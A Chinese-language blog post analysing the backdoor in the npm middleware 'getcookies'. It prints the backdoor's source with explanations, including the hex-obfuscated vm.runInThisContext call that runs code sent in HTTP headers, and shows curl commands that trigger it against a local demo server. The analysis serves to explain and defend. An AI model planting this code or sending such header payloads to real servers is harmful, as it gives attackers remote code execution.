前段時間 Express 中的一個中間件 getcookies 被爆出存在 backdoor，關注了一波，但僅看官方npm 的解釋，一時半會兒沒想明白黑客是怎么留的后門，一直困擾著我。今天有空仔細看了一下，了解了黑客具體的作案手段。文中的代碼可以在 drafts/getcookies 中查找。

原文鏈接

后門代碼分析

這個后門代碼找得也不容易，因為在被爆出后門后，npm 團隊第一時間就刪除下架了，github 上的倉庫也沒找到，不過不負有心人，在 npm.runkit 中找到了后門源碼。

• 黑客巧妙地把 backdoor 代碼偽裝成測試代碼放在 test 目錄中，并在 index.js “不經意” 引入了測試代碼
• 主要的 require('vm')['runInThisContext'] 代碼被編碼故意偽裝了一下
• 全程使用 16 進制，讓不想細看的人以為是測試代碼

// 分配一塊 64K 的內存
module.exports.log = module.exports.log || Buffer.alloc(0xffff);

// gCOMMANDhDATAi
JSON.stringify(req.headers).replace(/g([a-f0-9]{4})h((?:[a-f0-9]{2})+)i/gi, (o, p, v) => {
    // 以 0xfffe 命令為樣例
    // 將字符串 feff 讀入 Buffer
    // 'feff' => <Buffer fe ff>
    // readUInt16LE 讀取 16 bit(位) 并以 byte(字節) 反向排序
    // <Buffer fe ff> => 0xfffe
    //
    // > Buffer.from('feff', 'hex').readUInt16LE(0) === 0xfffe
    // true
    // > Buffer.from('1234567890', 'hex').readUInt32LE(1).toString(16)
    // '90785634'
    p = Buffer.from(p, 'hex').readUInt16LE(0);
    switch (p) {

        case 0xfffe:
            module.exports.log = Buffer.alloc(0xffff);
            return;
        case 0xfffa:
            return setTimeout(() => {

                // 去除末尾的 0x00
                let c = module.exports.log.toString().replace(/\x00*$/, '');
                module.exports.log = Buffer.alloc(0xffff);

                // 不能以 0x00 開頭
                if (c.indexOf('\x00') < 0) {
                    // require('vm')['runInThisContext'](c)(module.exports, require, req, res, next)
                    // 代碼必須是個函數
                    require('\x76\x6d')['\x72\x75\x6e\x49\x6e\x54\x68\x69\x73\x43\x6f\x6e\x74\x65\x78\x74'](c)(module.exports, require, req, res, next);
                }
                next();
            }, 1000);
        default:
            // 我們以 (function(){console.log('hack')}) 為例
            v = Buffer.from(v, 'hex');
            for (let i = 0; i < v.length; i++) {

                // 因為執行命令的時候，不能以 0x00 開頭
                // 所以，p 必須是 0x0000
                module.exports.log[p + i] = v[i];
            }
    }
});

測試一下后門

寫一個 express 應用，并將中間件引入進來

var express = require('express')
var app = express()

var getcookies = require('..');

app.use(getcookies);
app.get('/', function (req, res) {
  res.send('Hello World')
})

app.listen(3000)

啟動并執行我們的后門代碼

$ node demo/index.js
// 向服務器注入 16 進制代碼 (function(){console.log('hack')})
$ curl -H 'evil: g0000h2866756e6374696f6e28297b636f6e736f6c652e6c6f6728276861636b27297d29i'  http://127.0.0.1:3000
// 向服務器發送執行命令
$ curl -H 'evil: gfaffh00i'  http://127.0.0.1:3000

注意，中途出現的 hack 就是被注入代碼的輸出。

image

References

• 以上分析的倉庫代碼

• 文件來源

• 討論地址

• 細思極恐：后門代碼被隱藏在npm模塊中，差點就得逞

• npm blog

• 16進制轉換